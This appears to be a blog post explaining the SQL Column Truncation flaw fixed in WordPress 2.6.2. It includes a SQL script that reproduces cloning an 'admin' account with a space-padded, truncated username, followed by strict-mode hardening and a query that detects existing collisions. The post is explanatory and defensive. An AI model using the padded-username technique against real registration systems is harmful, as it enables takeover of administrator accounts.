A new WordPress version, 2.6.2, was released yesterday to mitigate an attack called SQL Column Truncation. If you allow users to register on your site, you need to upgrade to 2.6.2.

You might have heard of SQL injection, which is widely used by attackers. SQL Column Truncation is far less well known. It works because the database silently cuts an over-long value down to the column width instead of rejecting it: a malicious user registers a new account whose username is a known one, admin, padded past the column length, so that what gets stored is treated by the database as the same name as the real admin account. The attacker then gains access to your site by resetting that account's password, since the reset lookup can now land on the cloned row and its attacker-controlled e-mail address.

To learn more about SQL Column Truncation, read Stefan Esser's post "SQL Column Truncation". He gives a detailed example of how a user id can be cloned if you allow others to register on your site.
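To make the mechanism concrete, here is an added example (constructed for this post, not code or schema from WordPress or from Esser's write-up) that reproduces the clone on a minimal MySQL table. It assumes MySQL or MariaDB, a 60-character `user_login` column, and a PAD SPACE collation, chosen explicitly because MySQL 8.0's default `utf8mb4_0900_ai_ci` is NO PAD and trailing spaces would then count in comparisons; the table, column names, e-mail addresses and the `@evil` variable are all assumptions:

```sql
-- Added example: a constructed, minimal users table (not WordPress's schema).
-- The collation is chosen explicitly: utf8mb4_general_ci is PAD SPACE, so
-- trailing spaces are ignored when two values are compared.
CREATE TABLE users (
  ID         INT AUTO_INCREMENT PRIMARY KEY,
  user_login VARCHAR(60)  NOT NULL,
  user_email VARCHAR(100) NOT NULL
) CHARACTER SET utf8mb4 COLLATE utf8mb4_general_ci;

INSERT INTO users (user_login, user_email) VALUES ('admin', 'owner@example.com');

-- 1. The attacker's registration name: 'admin', 55 spaces, then one extra
--    character: 61 characters, one more than the column holds.
SET @evil = CONCAT('admin', REPEAT(' ', 55), 'x');

-- 2. The application's "is this username taken?" check compares the full
--    61-character string. The trailing 'x' makes it differ from 'admin', so
--    the check returns 0 and registration proceeds.
SELECT COUNT(*) FROM users WHERE user_login = @evil;   -- 0

-- 3. Without strict mode, MySQL truncates the value to 60 characters and only
--    emits a warning; what is stored is 'admin' followed by 55 spaces.
SET SESSION sql_mode = '';
INSERT INTO users (user_login, user_email) VALUES (@evil, 'attacker@example.com');
SHOW WARNINGS;   -- Data truncated for column 'user_login'

-- 4. Under the PAD SPACE collation a lookup by the victim's name now matches
--    both rows. A password-reset routine that finds the account this way can
--    pick the attacker's row and mail the new password to attacker@example.com.
SELECT ID, user_email, CHAR_LENGTH(user_login) AS len
FROM users WHERE user_login = 'admin';   -- two rows: len 5 and len 60

-- 5. Hardening on the database side: in strict mode the same kind of INSERT
--    is rejected (error 1406, Data too long for column 'user_login') instead
--    of being truncated. This statement is expected to fail.
SET SESSION sql_mode = 'STRICT_ALL_TABLES';
INSERT INTO users (user_login, user_email)
VALUES (CONCAT('admin', REPEAT(' ', 55), 'y'), 'attacker2@example.com');

-- 6. Check for accounts that already collide: logins grouped together here are
--    ones the database already treats as the same name.
SELECT user_login, COUNT(*) AS n
FROM users GROUP BY user_login HAVING n > 1;   -- admin, n = 2
```

Step 5 deliberately errors out, so run the script with the client's `--force` option or stop before it. Strict mode alone is not a complete fix, since the application may run against a server it does not control: the application should also reject any username longer than the column before it ever reaches the INSERT, and compare usernames exactly (for instance with `BINARY` or by length) rather than relying on the collation. Step 6 is the check to run on an existing site to see whether a clone has already been registered.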

It is therefore a good idea in general to rename the admin account to a username an attacker cannot guess, keeping the same privileges. Bear in mind that this only removes the obvious target: any username the attacker can learn can be cloned the same way, so the actual fix is the upgrade.